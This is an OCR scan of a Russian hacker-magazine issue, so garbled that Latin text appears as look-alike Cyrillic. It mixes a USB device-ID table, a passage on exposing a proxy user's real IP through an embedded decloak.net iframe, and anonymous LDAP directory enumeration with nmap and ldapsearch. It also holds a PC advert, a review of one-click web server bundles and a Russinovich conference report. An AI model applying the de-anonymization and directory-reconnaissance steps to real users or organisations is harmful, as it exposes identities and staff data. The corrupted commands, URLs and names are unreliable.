НІ0СІМ5 


НілчпІгКаГже Оеѵіся 


У« 


У5В\ѴЮ_04В1 ЬРЮ_40СЭ 




изо 


Мои» 




Ге( 


НЮ\Ѵ1й_0Л61№І0„4О03 


5600 


НЗВ 


УЗВ 


иЫегіаІ 5 аіаі В и* аМііоПас 


Но 


У5В\Ѵ1У,03ЕСйРід„61 мщу 421 1 VI РѴЭТ 


ТА5ЕНІЕ5 РОРТАВЁЕ САН0 ПЕА0ЕВ 


115В 






Но 


У5В\Ѵ1О_М03ЬРІО_Р7А1] 


нЕсддн цірооок 


изо 


УЗВ 


Угнегні) ЕяіаІ &ці солішва» 


Но 


УЗВѴѴ10_04(Ш10_[ХМО 




дзв 


ПорпОі$к 


ПорИ^$к(|іМп 


Но 


узвзтов^аорргьѵі^нЁСШтоо^дзѳ^ 


Судгвп С>ЪаѲепе 


изв 


УЗВ 


Уаѵег*аі Зоіо] Вш сѵЧіойэс 


Но 


У36\ѴЮ_(М42ІРІ0,РГАА 




дзв 


УлАант 


ОіЫг йеѵісе* 


Но 


У5 В \ѴЮ_В442ЬИ Р_РРМ*М ДМ 


Судгіоп С>Ъйіійгі(г 


изв 


Ми№ипсіяг> 


МФГипаіоп 


Но 


иЗВ\Ѵ10_О442ЬРІО_рРААШІ_ОО 


СудйпС^бсик 


УЗВ 


Упклйнг» 


СиЬсгйеѵюеБ 


Но 


У5В\ѴЮ_04424Р1Р_РРАА8МІ_(П 


Су^шпСфЕегк 


изв 


МиШЕипсЗоп 


МіАГипсДІоп «|др№й 


Но 


УЗВ\Ѵ10_М42ІР1»_ЕРААШІ_01 


СудтС^Сегп 


шв 


У і* помп 


аіЬ№сЬѵіс«і 


Но 


УЗ В \ѴГС_М42*Р1 Р_РР ДАШ І_02 


Слугип С^йЁегв 


У5В 


МиіІіРипсІоп 


М(АГипс4Іоп жіарГиз 


Но 


У5В\ѴЮ_(И4гМ , 10_РРАА*МЦТг 


ѴЛв1е« Т глгаяѵвг Га ЕімІмиИ 


115В 


Віи?*рс*К 


ВІиящгіЬПаА» 


Но 


У5В^ѴЮ_0і5е^0_007ЕЧХС1 533000Р2ІШ 


ЕодГнІі и$е 


ш 


УЗВ 


УгйиаЫ 5«іаІ Виі даДиЛа» 


Но 


узечѵю^меоьРо^оАСі 


іоаш* изв Нмімі 


УЗВ 


МЕУ1А 


5оиЫ, ийеочіЫ дате СОИ-. 


Но 


УЗВ^ѴЮ.ВІЗОЬЙО.СИЙІ ІМДОВ 


ЕРЗОМ 


УЗВ 


Іглзде 
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Но 
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Типичная программа, которая стоит на многих предприятиях и контролирует установку новыхустройств в системе. Хакеру предстоит поломать голо-| 
|ву, как обойти такую за щитуД 



позволить обойти прокси и спалить реальный ОЫЗ-сервер пользо- 
вателя. Установка прямого соединения может быть инициирована 
и с помощью ПазЬ-приложения, а если у пользователя установлен 
іТипез, то хитреца можно вывести на чистую воду с помощью нового 
протокола обращения Тгтіз. С недавнего времени разработчики 
сделали для своего проекта «Оесіоакіпд Епдіпе РетсТе А Р I » , который 
можно использовать на сторонних ресурсах. Чтобы применить его, 
генерируем себе уникальный идентификатор: 

шсЗ.5 ( " зесгеД " . $_ЗЕКѴЕК [ 1 КЕМОТЕ_АББК 1 ] . $_ 

8ЕКѴЕК [ 1 КЕМОТЕ_РОКТ 1 ] . Діте ( ) . " зесгеД " ) ; 

Кактолько мы его получили, смело юзаем следующий линк: 

<і Дгате згс= " ДШДр : / /Бесіоак . пеД /Бесіоак . Ъ.Дт1 ?сіс!=<иден 
тификатор>" ></ і Дгаше> 

Для получения результатов просматриваем: 

сіесіоак . пеД /герогД . ДЩт1?сіБ=<идентификатор>&ДогтаД=Де 
хД 

Н БЕРЕМ НА ВООРУЖЕНИЕ І_БАР 

В больших организациях практически всегда развернуты службы 
каталогов, в которых хранится информация о пользователях (в том 
числе, суказанием должностных обязанностей]. Одной изтаких служб 
является ЮАР, а протокол, по которому она работает, поддерживает и 
знакомая всем ѴѴіпбоѵѵз-пользователям Асбѵе Оігесіогу. Очень часто 
эта служба разрешает доступ с апопутоиз-аккаунта, какэто бываете 
РТР. Стандартные порты ЮАР — это 389/636, поэтому несложно узнать 
о наличии сервера с помощью сканирования птар’ом: ІЧтар — зѴ Ьозі: 
-рбЗб-РЫ. 

Подключение выполняется с помощью сторонних клиентских ути- 
лит (ЫарВгоѵѵзег/Ыар Ехріогег]. На І_іпих/ІІпіхІіке-системах можно 
воспользоваться встроенными средствами: ШарасИ, Шарсотраге, 
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Готовый инструмент, включающий несколько эффективных способов 
определить настоящий ІР-адрес человека 



Ісіа рсіеіеіе, Шар то б Ту, Ібартобгбп, ШарраззѵѵсІ, ШарзеагсЬ, 
ШарѵѵЬоаті. В случае доступа к каталогу ЮАР вполне реально узнать 
адреса, учетки, должности пользователей и организационную структуру 
предприятия. Пример типичного запроса и ответ на него: 

ІБарзеагсЪ. -ЬБЬ " (зп=зтіДЪ.) " сп зп ДеІерДюпеБитЪег 

сіп: иісі=бДз / сіс=ехатр1е, сіс=сот 

сп: БоДт ЗшіДІі 

сп: БоДт Т. ЗтіДЬ. 

зп: ЗтіДЪ. 

зп;1апд-еп: ЗтіДЪ. 

зп;1апд-Бе: ЗсЪтісіД 

ДеІерДюпеБитЬег : 

1 555 123-456731 
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на правах рекламы 






Цена - 27599 рублей 




і мѵиаплги 



ІШ Вгоѵа Ноте 126№на базе суперсовременного четырехъядерного процессора ІліеШ Соге™2 ($иоё 
- бескомпромиссное решение для требовательных потребителей/ Новый четырехьядерный 
процессор I піеі @ Сот™2 @иаб обеспечивает высочайшую производительность ПК при роботе с 
ресурсоемкими приложениями создании цифрового контента и компьютерными играми ІВЦ Вгоѵа 
Ноте 126\Ѵ изменит Ваше представление о роботе на компьютере, 

С 2007 года на компьютерах іИУ тренируются чемпионы 
мира по компьютерным играм (дисциплины Саипіег Вігіке 
и Ыеед Рог 5рееф - команда Ѵігіиз.рго. 

ІЙЦ Вгаѵа Ноте \20Ѵі 

процессор /л/е/ ® Соле™ 2 @иаб @9400 с частотой 2,66 СНІ 
видеокарта N VI 01 А СеРогсе 9600 СТ с 5 12МЬ памяти 
мультиформатный ОѴО привод 
встроенный кардридер 
гарантия 3 года 

Спрашивайте компьютеры іРШ в магазинах «П 03ИТР0Н И КА» 
м\шро5гігопіса. ги 

Официальный дистрибьютор ПК ІЯЦ— компания МЕВІІОЫ, мшш.тегііопти 




Корпорация ітеі не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений относительно 
конкретных компьютерных систем, упоминание о которых содержится в данном документе. 



© 2008 г, Сеіегоп, Сеіегоп Іпзісіе, СепТгіпо, СепТгіпо Іпвібе, логотип СепТгіпо, Соге Іпзісіе, логотип ІпТеІ, ІпТеІ, ІпТеІ Соге, ІпТеІ Іпвісіе, логотип ІпТеІ Іпзісіе, ІпТеІ Ѵііѵ, ІпТеІ ѵРго, ІТапіит, ІТапіит Іпзісіе, РепТит, Репііит 
ІПБісІе, Ѵііѵ ІПБІсІе, ѵРго Іпзісіе, Хеоп, и Хеоп Іпзісіе являются товарными знаками права на которые принадлежат корпорации ІпТеІ на территории США и других стран. Все права защищены. Реклама. 
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Ій 

СЕРВЕР 
В ОДИН КЛИК! 





ПОДНИМАЕМ ВЕБ-ДЕМОН БЫСТРО 



і 



панн 



«Сделать так, чтобы все заработало». Отличная кнопка, которая в идеале 

іі ■■■■II! — 

бьп 



должна оыть у каждой программы, начиная от маленькой утилитки 



и заканчивая тяжелым сервером. Увы, встретить ее удается нечасто, 
но и тут бывают исключения. Особенно если речь идет о веб-сервере! 




ИВІІПІН 



□ огда-то давно можно было заполучить ящик пива, поспорив 
с другом, что за 2-3 минуты сможешь поднять полноцен- 
ный веб-сервер с кучей интерпретаторов, СУБД и даже 
некоторыми служебными скриптами. Сейчас, ксожалению, 
такой фокус не пройдет — любой, кто когда-либо пытался запустить или 
написатьсвой скриптик, слышал о качественной российской разра- 
ботке Оепѵѵег. Нисколько не хочу задеть чувства серьезных хакеров 
и администраторов, знающих опции конфигурирования Арасбе и 
настройки 3 Р и Ьу, но во многих случаях оченьхочется иметь именно 
ту, уже упомянутую, волшебную кнопку. Не качать и компилировать, не 
править исходники и не копаться потом в настройках, заодно проверяя 
совместимость всего со всем (втом числе, с твоим характером] — а 
просто запустить сервер. 



^ НАБОР ВЕБ-ДЖЕНТЛЬМЕНА 

Джентльменский пакетвеб-разработчика, или Денвер [ ЬНрУ/сІепѵѵег.ги ]. 
разработан Дмитрием Котеровым, который многим известен какавтор 



папина 

популярных книг по РНР. В наши дни штука кажется довольно незатей- 
ливой, но на деле оказывается исключительно полезной. В базовый ва- 
риант включен настроенный веб-сервер, почтовый сервер для отладки, 
РНР, Регіи Му5СН_ — все хозяйство умещается в крохотный инсталлятор 
размером в4 Мб. Это означает, что в угоду миниатюрности вселишнее 
с дистрибутива безжалостно выброшено. Недостаточно функциональ- 
ности? Ты всегда можешь расширитьтот или иной компонент, загрузив 
модули с сайта: модули РНР, СУБД РозІдгеЭОЦ полная версия Му501_, 
пакеты АсбѵеРегІ и Руібоп и даже РагзегЗ. Оепѵѵег ставится в указан- 
ную директорию и имеетсвою панельзапуска, полностью затирая за 
собой все следы, когда дана команда остановки. Поэтому сервер можно 
ставить на любой компьютер и даже на флешку — и всегда носить с собой 
кусочек интернета. 

Главным же в Оепѵѵег’е по праву считается система виртуальных доме- 
нов. Работаетона следующим образом. Для создания сайта по адресу 
зііе.сот достаточно в директории боте создать папку с именем сайта, а 
внутри — папку ѵѵѵѵѵѵ, которая и будет корневой для сайта. Конечно, все 
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Все эти приложения доступны 
в один клик, без необходимости 
настройки сервера! 



пни 



Оеіт'Г »> Джентльменский Набор \\>Ь Разработчика 



< 11113 

■Я*. ДИ?] Главног мгню 



Вии решим 
§ Д«м«х 



О 



Д.чѵ,м ад кл*,'л-слій4 набор ѴяЪуафайоннжа («Д кѵ р». чпміи ѵДаяця) — щ>оаа Дюпуіи Ксиірс*-». набор дистрибутиве» (АрасЬ*. РНР. 
Му&ЗИ. Роі я т д) и трог ршоош о6ояо»ол. иеошолуекме ѴѴА рлір.г6отвосиві ди радрвбстхи сайт» т «двшсвий» (лсвалжД) ШішЮжв 
машнме без иеоЬхотмоіт дога» » Интернет Гл* ми особеммость Денвер* — уюЛспю при ущиежнов работе сразу мал иее ко ям зо о і 



• Ду м ай 

• ЯР.АПМЕ 



Пакеты ртіпшфгпй 



0 Скачать базовый пакет Денвера.З (5 5 МБ; подробное описание) 

оостм АисЫ 2 • $51, ВНР Т.НуХОС I, МѵМуАамгѵ мпсгсгровтост*, рабді* с ПмЬ-пмкіяпам 

Скоро на жранах: Денвер-4 






Подходит х концу разработка Деішерв-4 Ноеовнедеиім. графический нистапдитор. поддержка миогоизычиого интерфейса, кеобязатеда моетъ 
виртуального диска, работа в качестве сервисов ѴЛа4оѵп. поддержка РайСОІ. КиЬу о« Кжіз в, конечно, обновление версий всех 
компонентов Разработку ведет Алтон Сущее 

В «вязи с зтим очень кстяга будут ваши 

...Пожертвования 

11а главной страхнце Денвера полая тел имя в ссылка одного из людей, решавших помочь проекту с момента предыдущего релиза Сейчас 
мы благодарим следующих пользователей за их пожертвовал ил (полный спипкУ 

■ 1250 Александр Онлайн игра) 12008-02-271 

• 1128. Игорь Тарасов (Ф Соэдлине сайгой) [2008 06-201 

• 150 ОояА(ДѴ . . О (2008-09-30] 



Пожартаовоік | {гёо руб 
Яндекс Деньгами на счет 41001566*6080 



• РНР 5 дополнительные модули 

• РояягебОЬ Я 2 ♦ модули РНР 

■ Денвер + Рае зет в одном песете 

• ЛсЬѵеРетІ.5 8 

■ Аспу еІ ^Ьоп .2.5 

Й & Л Л ЗД ШЯЬЙЙ 

• АрзсЬе 2 1 тшашшш 

модули 

■ рнр? емйнйіапрн&ти 

• РесВх^^.м о дули^ ЫГ 

• МубО Ь 5 дополнитель ные 

модгяи Я УТИЛИЗЫ 

• М^Йк±-ПЁ*ДНД ДИЙЯЙКИ 

Ов|ііітиая связь 

■ й* ф орум Ден вера 

■ ^ Часто зц-шаемые В9ДВ96М 



Оепѵѵег — наш ответ ХАМРР и другим, с лучшей системой виртуальных хостов 

ЬцРІР!» 1 — 



іи*» 



эти адреса будут работать только после перезапуска Оепѵѵег’а.таккак 
для нее создаются записи в системном файле Ьозіз и автоматически со- 
здается ѵНозіз.соп^для АрасНе. Так что, тебе, в принципе, ничего не надо 
особо делать — создал структуру директорий и вперед, создавать сайты! 

Резюме: самое простое решение 

Н ИЩЕМ КРОССПЛАТФОРМЕННЫЙ ИНСТРУМЕНТ 

Серьезный недостаток Денвера — работа исключительно подокнами. 
Для более серьезной работы уже давно обосновался другой лидер — па- 
кет ХАМРР [ ѵѵѵѵѵѵ.арасЬеітіепб5.огд/еп/хатрр.Ьіт[ ]. который работает во 
всех распространенных ОС (а значит, в ѴѴіпбоѵѵз/ипих/МасОЗ/ЗоІагіз). 
Полная версия помимо стандартной связки АрасЬе/Му50І_/РНР включа- 
етеще множество дополнительных библиотек, встроенный акселератор 
РНР-скриптов, РТР-сервер, поддержку 551 и многое другое. Ты можешь 
установить Ыіе-версию, представляющую собой упрощенный и легкий 
пакет для предельно быстрого старта сервера. В пакете есть собствен- 
ная система управления и мониторинга статуса сервера, небольшая 
программа для выборочного запуска или остановки отдельных серви- 
сов. Также, каки Оепѵѵег, ХАМРР поддерживает плагины: софсайтаты 
можешь взять ТотсаС более новый Регі и специальные инструменты 
для разработки и отладки. По возможностям ХАМРР І_іІе примерно 
равен нашему Оепѵѵег’у, разве что в нем больше библиотек, да и размер 
солидный (шуткали,43 Мб против всего лишь4-ху Оепѵѵег-а]. Но 
посмотрим на это с другой стороны: привычной системы виртуальных 
хостов тут нет. Справедливости ради стоит сказать, что их нет вообще 
нигде, кроме Денвера. Вотздесьтебе все же придется поработать рука- 
ми и головой, вручную настраивая их через конфиги АрасЬе. Впрочем, 
знания настроексервера, еслиты метишь в солидные программисты, 
еще никому не помешали. 

Резюме: кроссплатформенное решение, которое подойдет для всех 

Ш УДОБНАЯ ПАНЕЛЬ УПРАВЛЕНИЯ 

Другая разработка, ІІпйогтБегѵег ( ШрУ/ѵѵѵѵѵѵ.ипііюгтзегѵег.сопп ) — во 
многом более продвинута и дружественна к пользователю, чем все ос- 
тальные. При этом она включает в себя все основные компоненты, хоть 
и несколько устаревших версий (последняя версия сервера, 3.5, вышла 
в середине 2008 года, однако уже идет разработка следующей], и, что 
интереснее всего, мощную систему администрирования и управления 
настройками прямо в браузере. Настроить АрасЬе, сконфигурировать 
Му50І_ или посмотреть параметры РНР — можно при помощи простой 
веб-панели. Дополнительно можешь загрузить небольшую программу 
ІІпіТгау, которая вынесет наиболее нужные действия в меню втрее. 
Среди расширений, доступных на сайте, отмечу РТР-сервера. Для 
Заѵа-разработки ты вправе выбирать между классическим Тотсаі или 
продвинутым Резіп. По сравнению с ХАМРР размер инсталляционного 



файла просто поражает— всего 7 Мб, ктомуже девиз разработчиков 
звучиточень привлекательно: « 3 изі; ипраскапб РІІІЧ!». Минусом можно 
считать только поддержку ѴѴіп32-платформы, однако часто ли тебе 
надо работать на Мас05 или 5оІагіз? 11пііюгт5егѵег станет идеальным 
выбором, еслиты с друзьями создаешь веб-студию или развертываешь 
сервер для тестирования своих скриптов в случае фриланса. 

Некоторая ограниченность всех подобных серверов — втом, что их ком- 
поненты заранее подобраны и настроены. То есть, просто скачиваешь 
и используешь, и максимум, что ты в силах еще сделать — это доставить 
расширения. Обычно в составе таких пакетов естьодна или две версии 
РНР, 4 и 5, но что делать, если оченьхочется работатьс несколькими 
версиями (и не одной-двумя, а больше)? Ставить столько сбороктого же 
Оепѵѵег-а или ХАМРР, сколько разных версий тебе надо, а потом мучать- 
ся с копированием своих разработок на каждый сервер в отдельности? 
Или долго копаться и изучать возможности настройки сервера, разнеся 
различные версии интерпретатора РНР по разным виртуальным хос- 
там? Но эта работа по сложности приближается к созданию собственно- 



Самый известный пакет«все в одном». Правда, сегодня уже не фаворит 
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В любой момент мож- 
но включить нужную 
версию РНР и протес- 
тировать скрипты 



Отличный выбо р для сервера небольшой организации или 

“ТіЯІІІІІІІ 



Админ-панель сервера — нечтосреднее между простым ОШ 
и ручным конфигом ■ 

* Л ■■1111! 




го проекта уровня ХАМРР Ыіе ! А что если... ага, и здесь уже другие поду- 
мали, создав разработку ѴѴАМРзегѵег [ ѵѵѵѵѵѵ.ѵѵатрзегѵег.сопп і. которая 
мало чем выделяется среди аналогов, кроме одной интересной опции. 

Я говорю об изначально встроенной панели управления, представ- 
ляющей собой крохотную программу втрее. Прямо через контекстное 
меню реально настроить любые параметры. Для РНР можно выборочно 
включать и выключать модули расширения и опции конфигурации 

— тоже самое доступно и для Арасбе с МуЗОЕ. Более того, ѴѴАМРЗегѵег 
позволяетустановить и использовать сразу несколько версий каждого 
компонента, предоставляя своеобразный конструктор. Хочешь Арасбе 

1 .3 + РНР 5.1 .2 и МуЗОЕ 5.1 .30? Пожалуйста, пара кликов мышью в меню 

— и все работает. И сейчас это единственный дистрибутив, который 
сразу установиттебе самые последние версии всех компонентов, 
без необходимости вручную что-либо скачивать и доустанавливать. 
ѴѴАМРзегѵег — идеальный инструмент для тестирования приложений, 
которые должны работать в любыхусловиях, даже если на сервере РНР 
двухлетней давности. Порекомендуй этот продукт другу, который делает 
сайты, или местной веб-студии, думаю, благодарность не заставитсебя 
ждать! 

Резюме: сервер с удоБной панелью управления 

В ЛЮБЫЕ СЕРВЕРА И ПРИЛОЖЕНИЯ ЗА МИНУТУ 

Компания ВіШаті появилась на рынке относительно недавно, но со 
смаком выкладывает в открытый доступ все свои продукты. В первую 
очередьэто набор стеков технологий — в него входят веб-сервер, обыч- 
но Арасбе, база данных Му5С11_, атакже все дополнительные библиотеки 
и модули. В пакеты включены интерпретаторы языков программиро- 
вания: в зависимости оттипа стека это РНР, РуЙюп, ПиЬу или Заѵа. Они 
дополняются системами администрированиятипа рЬрМуАбтіп для 
управления базами данных. Если хочешь быстро начать разработку или 
просто запустить какой-то скрипт, то такого стека вполне достаточно, 



чтобы уже спустя пять минут (после скачивания и установки] начать 
полноценную работу. 

Для экспериментов доступны следующие пакеты: 

• 0]апдо51:аск — стекдля РуДюп-приложений на базе 0]а пдо, содержит 
Арасбе, МуЗОЕ, РуДюп и 50Ы1;е ; 

• 3 Ри ЬуЗЕаск — для маньяков, предпочитающих Рыбу на Заѵа. Содер- 
жит сервер приложений ОІаззБізЬ, 5ип ЗОК, РиЬу Оп Раііз, Тотсар 
ЗиЬѵегзіоп и СУБД Му50Б. Это один из самых сложных стеков, так как 
позволяет нетолько запускать приложения, но и вести разработку, 
содержит инструменты для экспорта твоего творения вѵѵаг-файл и 
развертывания его на сервере ТотсаЕ По сути, это полностью готовая 
среда разработки, тестирования и работы. Сюда стоит добавитьтолько 
ЮЕ для ПиЬу; 

• БАМРЗіаск — самый простой стекдля платформы Біпих, содержит 
классический набор Арасбе, РНР и МуЗОБ (вместе с системой админис- 
трирования рЬрМуАсІтіп]. Еслитебя бросаетв дрожь при упоминании 
МуЗОБ, бери БАРРЗіаск — там все то же самое, только база заменена на 
РозІдгеЗОБ; 

• МАМРЗіаск и МАРРЗіаск — тот самый БАМР, который «для думающих 
иначе». Короче — Арасбе, РНР и МуЗОБ или РозІдгеЗОБдля операци- 
онной системы Мас05Х(какна I пБеІ процессорах, таки РоѵѵегРС). Нуа 
если ты совсем крутой, то есть и для Зоіагіз — ЗАМРЗіаск. Боворят, что 
ОрепЗоІагіз — неплохой выбор для домашнего сервера; 

• ѴѴАМРЗіаск и ѴѴАРРЗіаск — это для поклонников ѴѴіпбоѵѵз, а в осталь- 
ном —тоже, что и классический БАМР; 

• РиЬу51;аск — содержит все для разработки веб-приложений на РиЬу и 
Раііз, базу данных МуЗОБ и ЗиЬѵегзіоп, атакже дополнительные РиЬу- 
библиотеки. Правда, вэтом пакете нет веб-сервера, так что его придется 
ставить самостоятельно (постигшего Дао РоР это не остановит!]. 
Используя эти пакеты, ты просто запускаешь инсталлятор и получаешь 
готовую рабочую среду со всеми настройками. Но ведь одних стеков 
мало, да и клюнут на них лишь начинающие разработчики и любители 




> СІѴСІ 

Последние доступ- 
ные версии каж- 
дого из пакетов ты 
найдешь на нашем 
БУБ-диске. 



Переносной сервер 

РоіТаЫе-сервер? Команда разработчиков ШДогт-а пошла еще дальше, чем Денвер, который можно запустить 
прямо с флешки. Компания представила семейство МіпіЗегѵег — набор небольших пакетов, каждый из которых 
самодостаточен для демонстрации того или иного скрипта, программы или функциональности. Такой подход 
аналогичен продуктам ВіШаті, только построен на открытой основе. Сейчас существует несколько МіпіЗегѵег- 
ов, например — АрасЬе, АрасЬе + РНР, МуЗОБ 4/5, КеѵегзеРгоху, Эоотіа, РЬрВВ, ХООР5, ѴѴогсіргезз и МебіаѴѴікі. 
Каждый сервер может работать как рогшЫе-версия или системный сервис. Загрузить их пока что можно только 
на странице проекта на ЗоигсеРог^е.пеІ:: Ьнр://5оигсеГог;ее.пег/ргоіесг/5ЬоѵѵШе5.р1ір?;щоир іб = 53691&раска^е 
іс1 = 275691 . 

Современные мобильные платформы также составляют конкуренцию ноутбукам и десктопам. Например, легко 
превратить смартфоны Ыокіа Е90 или N95 в полноценный сервер для веб-разработки поможет пакет РАМР — пер- 
сональный АрасЬе, МуЗОБ и РНР Г Ьнр://5оигсебог^е.пег/ргоіесі:5/ратр) . Это уж точно, персональнее некуда! 
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Только для ѴѴі псІо\л/5 р нозато любые версии компонентов 



поиграться. ВіШаті пошли еще дальше. В их распоряжении есть ин- 
тереснейшая технология, позволяющая создавать инсталляции любо- 
го веб-приложения. При этом не надо ничего настраивать и конфигу- 
рировать— все программы, от простейшего ѴѴогсІргезз до сложнейших 
бизнес-систем ЗидагСРМ или ^зрегВегѵег, ставятся в пару кликов 
и сразу готовы к работе. Конечно, это не для реального применения 
на сервере, скорее — просто демонстрационные версии популярного 
ПО. Но зачем тащить за собой целую ОС и сотни мегабайт, если часто 
достаточно небольшой исполняемой среды! Такчто, ВіШаті сделала 
отличную альтернативу виртуальным машинам для многих случаев. 
Кстати, по всем правилам ѴѴеЬ 2.0, ты можешь голосовать за програм- 
мы, которые будут вскоре первыми доступны в виде пакетов. Сейчас 
как раз идет голосование [ ШрУ/ЬіІпаті.огд/роиз ] и выбирается 
десятка популярного ПО, — что же первым перенести на стек ВКЫаті. 
Возможно, Азіегізк — идеальный кандидат (это приложение сложно 
без подготовки поставить и запустить, а вот попробовать его в работе 
очень даже хочется]. 

Резюме: готовые приложения за несколько минут 

В РАБОТАЕМ В КОМАНДЕ РАЗРАБОТЧИКОВ 

ВКЫаті — лишь решение для быстрого показа уже готовых программ и 
веб-приложений. А что делать, если охота самому начать разработку, но 
времени и знаний на развертывание всего набора серверов нет? 

Для быстрой разработки веб-скриптов или запуска на своем компьютере 
небольшого хостинга есть куча разработок и неважно, ѴѴі псіоѵѵз у тебя , 
І_іпих или крутая ОрепВВО. Достаточно загрузить установочный пакет 
и запустить его — через пять минут можешь открывать свою любимую 
ЮЕ и кодировать веб-сайт. Как минимум, утебя сразу будет вместе с 
веб-сервером и база данных, и система управления всем хозяйством, и 
даже простой почтовый сервер. Крутые пакеты, кроме этого, предоставят 
еще и свою систему быстрой настройки виртуальных серверов —тогда 
создать сайт ѵѵѵѵѵѵ.тісгозоіі.сопп на своем компе будет раз плюнуть. Да и 
просто устанавливать и тестировать различные веб-скрипты лучше на 
разных доменах, а не безликом локалхосте. 

Если же речь зашла об организации сервера в небольшой веб -сту- 
ди и или для группы фрилансеров, то обрати внимание на проект 
Магаіо [ Ьир://5оигсеЬгде.пе1:/рго]ес1:5/пага1о ]. Изначально он 
ориентирован на организацию сервера для группы разработчиков, 
содержит, кроме классического набора компонент, еще и дополни- 
тельные программы, установка которых на другие пакеты затрудни- 
тельна. Тебе в помощь будут ОрепЮАР и ЗиЬѵегзіоп, дополнитель- 
ные интерпретаторы РуіЬоп и Рыбу, а также интегрированный пакет 



Если считаешь, что все эти сервера — для ламеров и неудачни- 
ков, то ты отчасти прав! Разрабатывая крупные программы, 
хорошо бы встроить какой-то простой веб-сервер. Иногда же, 
ради одного маленького скрипта, жаль устанавливать монс- 
тров типа АрасЬе. Здесь тебе помогут маленькие и специализи- 
рованные сервера, часто призванные исполнять одну единс- 
твенную функцию или скрипт — зато очень и очень быстро. 
Например, РіЗѴѴеЬ Г ѵ\п/ѵѵѵ.рі3.огщ) — многопоточный НТТР 1.1 
сервер на С + + , оптимизированный для работы с ССІ/РазгССІ- 
протоколами, может использовать встроенный интерпретатор 
РНР или исполнять Іаѵа-сервлеты. А при помощи Уа§8 Питр:// 
ѵаазз-ргоіесг.зоигсеіог^е.пеі:) несложно реализовать аналог 
медиа-сервера с Арріе іТипез интерфейсом на РІазЬ-е, который 
сможет раздавать по Сети твою МРЗ-музыку. Посмотри также 
на ЬшсЫ — небольшой сервер со встроенным интерпретато- 
ром Ткі, предназначенный для поддержки веб-интерфейсов 
Ілпих-программ. Поклонникам С + + (и ненавистникам Іаѵа) 
советуем СРР5ЕКѴ С Ьггр://зоигсе1ог^е.пеі/ргоіесі:5/срр5егѵ) 

— простой сервер, реализующий ЗегѵІег-АРІ для программ на 
С + + . На нем можно написать очень быстрые многопоточные 
демоны, используя только С + + и никакого РНР! В противовес 
этому для Іаѵа есть простейший встраиваемый серверный 
движок Зітріе, который, несмотря на миниатюрность, имеет 
мощный АРІ и расширяемую компонентную структуру. Его 
отлично можно использовать для небольших сетевых прило- 
жений на Іаѵа, исключая необходимость в сложных серверах 
вроде Тотсаг. Хорошим реальным применением этого движка 
стал КЕЗТІез Гѵѵѵѵѵѵ.гезгІег.огЕг) — фреймворк для построения 
КЕ5Т-сервисов (это простые сетевые приложения, которые 
реагируют на НТТР-команды) . 



Тгас для организации процесса разработки в коллективе. Все это не 
просто отдельные программы, а настроенные на совместную работу 
в единой среде, кпримеру — Тгаси 5ѴЫ использует 0 реп ЮАР для 
управления учетными записями, поэтому, один раз установив этот 
сервер, дальше достаточно будет добавлять пользователей через 
панель управления (рЬрШа раб тіп]. С таким набором можно смело 
начинать свою фирму! 

Резюме-: инструмент для кодеров 

Ш 5ЕКѴЕК5НІГШ0ѴѴЫ 

Как видишь, для организации простого сервера совсем необязатель- 
но тратить целый день на перебор различных вариантов программ 
и копаться в настройках и конфигурациях. В большинстве случаев, 
если надо что-то запустить по-быстрому (для работы или испытания], 
вполне хватит готовых пакетов, в которые сразу входят все необходи- 
мые компоненты. Такие пакеты часто не требуют инсталляции и готовы 
работать сразу после запуска, неважно — с флешки или жесткого 
диска. Даже обычный мобильный телефон с легкостью превращается 
в переносной сервер! Для создания собственного сервера и активных 
экспериментов с РНР-скриптами я бы рекомендовал отечественный 
Оепѵѵег. Если хочешь попробовать, кактвой проект будет работать 
в разных окружениях, испытай его при помощи ѴѴАМРзегѵег-а, в 
котором доступны даже самые последние альфа и бета-версии 
РНР и Му5СИ. А если друг попросит помочь на фирме, поставь им 
ІІпіЬгтЗегѵег или Ыагаіо и всем будет счастье! Но помни, что та кая 
простота обманчива — если не разбираться в тонкостях работы всей 
этой системы, никогда не станешь по-настоящему профессиональным 
разработчиком! □С 
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4-5 декабря в Москве проходила конференция «Платформа 2009». Мероп- 
риятие давно стало традиционным: это уже десятая конференция, которую 
компания МісгозоН проводит в России. Но в этот раз это была не просто кон- 
ференция, а мероприятие, на котором в качестве докладчика прилетел в 
Москву и выступил сам Марк Руссинович. 



В САМЫЙ ГЛАВНЫЙ ЭКСПЕРТ 

Любопытным интересно будетузнать, что Марксейчаструдится в 
МісгозоЛ и является членомтехнического совета корпорации. Впрочем, 
какая нам к черту разница, насколько высок этот пост (хотя на самом 
деле, это аналог вице-президента, но применительно ктехническому 
аспекту] — главное, что мы знаем Марка как разработчика умопомра- 
чительныхутилитБузіпІегпаІз и автора убойных книг по внутреннему 
устройству Винды. Покажите мне мало-мальски толкового специалиста, 
который бы ни разу не держал в руках мониторы Рііетоп и Педтоп и 
продвинутый Іазк-менеджер Ргосезз Ехріогег или НооІкііВеѵеаІег, от 



которого долго не могли спрятаться даже самые сложные руткиты. Да 
неттакого! По сути, это джентльменский набор каждого, кто хочет иметь 
представление отом, что происходит внутри системы. Другой вопрос, 
умеют л и им грамотно пользоваться? Так вот, Марк лично показал в 
действии свои утилиты, представив на суд зрителей два интереснейших 
доклада, которые, кстати говоря, ты сможешь посмотреть на нашем 0Ѵ0. 

ПОИСК И УСТРАНЕНИЕ НЕИСПРАВНОСТЕЙ В ѴѴтООѴѴБ-СИСТЕМАХ 

Настоящий клад для любого ІТ-специалиста! Фактически пошаговая 
инструкция для поиска и устранения, казалось бы, необъяснимых оши- 
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бок приложений и самой ѴѴіпсІоѵѵз. Не в размытой теории, а 
на самой, что ни на есть практике, с реальными примерами 
сбоев и возникающих проблем, Маркв деле покажет функ- 
ционал Місгозоіі: БеЬиддтд Тооіз и утилит Зузіпіегпаіз, в 
том числе — Ргосезз Ехріогег, Ргосезз Мопііюг и Ассеззсбк. 
Лично я с неподдельным интересом послушал все от начала 
до конца, узнав много нового по поводутого, как нужно 
реанимировать систему. 

технологии безопасности ѵѵтооѵѵз 

В ѴѴіпбоѵѵз-системах используется сразу несколько тех- 
нологий безопасности. Мы, конечно, с радостью пишем о 
том, как их можно побороть и обойти, смакуя и указывая на 
недоработки. Но надо отдать должное, многие разработки 
более чем успешны и справиться с ними хакерам и вирусам 
подчас очень сложно. В этом докладе Марк рассказывает 
отом, что делаютсистемы Собе Іпіедпіу, РаІсНѲиагсІ и ІІзег 
Ассоипі Сопіхоі и наглядно объясняет, какони устроены. Не 
менее интересно послушать и том, какизменилась в пос- 
